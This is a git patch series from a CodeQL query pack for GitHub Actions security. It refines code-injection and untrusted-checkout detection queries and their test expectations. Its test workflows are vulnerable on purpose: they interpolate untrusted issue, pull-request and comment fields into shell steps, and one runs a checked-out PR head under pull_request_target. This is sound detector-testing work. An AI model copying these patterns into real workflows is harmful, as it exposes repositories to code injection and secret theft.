+ - ["workflow_call", "github.event.discussion"] + - ["workflow_call", "github.event.head_commit"] + - ["workflow_call", "github.event.inputs"] + - ["workflow_call", "github.event.issue"] + - ["workflow_call", "github.event.merge_group"] + - ["workflow_call", "github.event.pages"] + - ["workflow_call", "github.event.pull_request"] + - ["workflow_call", "github.event.review"] + - ["workflow_call", "github.event.workflow"] + - ["workflow_call", "github.event.workflow_run"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 995fefe4a15e..4ca3753f50cd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it - - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' @@ -14,3 +14,4 @@ jobs: - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - run: echo '${{ github.event.pull_request.head.ref }}' - run: echo '${{ github.head_ref }}' + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index afd39605bb31..9992fd8e4cbd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,7 +13,7 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - run: ${{ steps.source.outputs.value }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 34e173a055b5..dc653a074e98 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | @@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | @@ -262,4 +259,3 @@ subpaths | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 4b2704043737..ab0a69a8fa8b 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | @@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | @@ -312,8 +309,6 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | @@ -332,8 +327,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml deleted file mode 100644 index 8bfa15b405c5..000000000000 --- a/ql/test/query-tests/Security/CWE-094/action1/action.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: 'test' -description: 'test' -branding: - icon: 'test' - color: 'test' -inputs: - test: - description: test - required: false - default: 'test' -runs: - using: "composite" - steps: - - run: echo '${{ github.event.comment.body }}' From e28ad1d644e50148ec8efb43e85519658b9d88ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 294/707] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc1..a3fcc9e0403d 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d9..562fc0809b7a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From 558bea84d435f7b0cd10a775c6eb65478e5bec63 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 295/707] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 000000000000..1debaecf97d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 612be64ffcaa276f659bc1a4d98005d90a3e19f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:10:26 +0200 Subject: [PATCH 296/707] Consider actor and association checks as bypassable checks ONLY for issueOps --- .../CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 10 ++++++++-- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 10 ++++++++-- 2 files changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a3fcc9e0403d..b7b8a3cf9564 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 562fc0809b7a..658879222315 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep + not checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() From dfeefe0caabc46a1676b042b9ea189fc8892e4c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:17:26 +0200 Subject: [PATCH 297/707] Consider actor and association checks as bypassable checks ONLY for issueOps --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 4 +++- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 5d501f2cea9a..6b3e0628f40b 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index e2f2b26a75ca..fcf832699603 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution not checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) From 47a66e10756f0d9ba4c9860b8c6e769c59baeed3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 21:43:00 +0200 Subject: [PATCH 298/707] Add TODO --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5e4f078bc3ac..0370b1ca4c3f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1290,6 +1290,8 @@ class MatrixAccessPathImpl extends TMatrixAccessPathNode { } private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + // https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations YamlMappingLikeNode root, MatrixAccessPathImpl accessPath ) { // access path contains no dots. eg: "os" From 5f8bab0608a9d2a3f460847e35cf2f45b920b868 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 22:36:26 +0200 Subject: [PATCH 299/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7413744d3ff1..b1a100a7040e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.25 +version: 0.0.26 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6bb27759f068..341b6f45c298 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false 